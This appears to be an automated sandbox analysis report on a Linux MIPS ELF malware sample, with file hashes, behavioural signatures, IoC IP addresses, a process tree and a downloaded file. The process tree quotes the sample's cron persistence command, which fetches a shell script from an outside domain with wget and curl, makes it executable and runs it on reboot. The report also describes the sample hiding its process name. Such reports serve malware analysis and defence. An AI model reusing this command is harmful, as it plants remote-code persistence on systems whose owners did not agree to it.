Analysis
- max time kernel: 150s
- max time network: 149s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240611-en
- resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 28-10-2024 01:07

Static task: static1
Behavioral task: behavioral1
Sample: 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf
Resource: debian9-mipsbe-20240611-en
General
- Target: 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf
- Size: 99KB
- MD5: 2bc1855eb4297c28116e412b6705e14a
- SHA1: 4d8189399c887b335e1d690961e38b806948d9cd
- SHA256: 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad
- SHA512: 1074aa161b94e13c473e8cf23d6bbd6baa531854b4c110b8142ccd8e8296b6a94751e55907f9ed6aff7d1b470676c81ea5754fdfeef14f8829dc9a5e3452d26e
- SSDEEP: 1536:uo6JSd6vTfjZ0IonWnP4MmBGSBGxJGSnuqMLHRvMNswe+fYgHIRyyR:upP5ld4MaqMjRUKuYRyyR
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTPs, 1 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
- Renames itself (1 IoCs)
  Processes:
  - process: 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf, pid: 705
- Unexpected DNS network traffic destination (2 IoCs)
  Network traffic to other servers than the configured DNS servers was detected on the DNS port.
  IoCs:
  - Destination IP: 139.84.165.176
  - Destination IP: 185.181.61.24
- Creates/modifies Cron job (1 TTPs, 1 IoCs)
  Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  Processes:
  - File opened for modification: /var/spool/cron/crontabs/tmp.22OlBk (process: crontab)
- Changes its process name (1 IoCs)
  Processes:
  - Changes the process name, possibly in an attempt to hide itself: mini_httpd (pid: 705, process: 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf)
- Reads runtime system information
  Processes:
  - Files opened for reading by crontab: /proc/filesystems, /proc/filesystems
  - Files opened for reading by 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf: /proc/mounts, /proc/724/status, /proc/730/status, /proc/718/cmdline, /proc/725/status, /proc/708/cmdline, /proc/727/cmdline, /proc/727/status, /proc/1/cmdline, /proc/728/status, /proc/729/status, /proc/731/status, /proc/726/status, /proc/2/cmdline
Processes
- /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf
  command line: /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf
  PID: 705
  - Renames itself
  - Changes its process name
  - Reads runtime system information
  - /bin/sh
    command line: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
    PID: 709
    - File and Directory Permissions Modification
    - /usr/bin/crontab
      command line: crontab -
      PID: 712
      - Creates/modifies Cron job
      - Reads runtime system information
    - /usr/bin/crontab
      command line: crontab -l
      PID: 713
      - Reads runtime system information
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 306B
- MD5: 7f870874f6e2e8a519bfb12fd9595bae
- SHA1: a06aa499becd5f448356d6dcd76441142f5f4142
- SHA256: 09cfd32d5d70dceebe59d6eecc03de39f65428f59b214c62dea20d331085c51d
- SHA512: f05c5887976e1e645d3b82d48f1492b24ef680e54483625d8eecc912ea4d38c36db62d9296bff4e3b1f418e7e50cde9c5083d685e77860c61372b19a6c06d620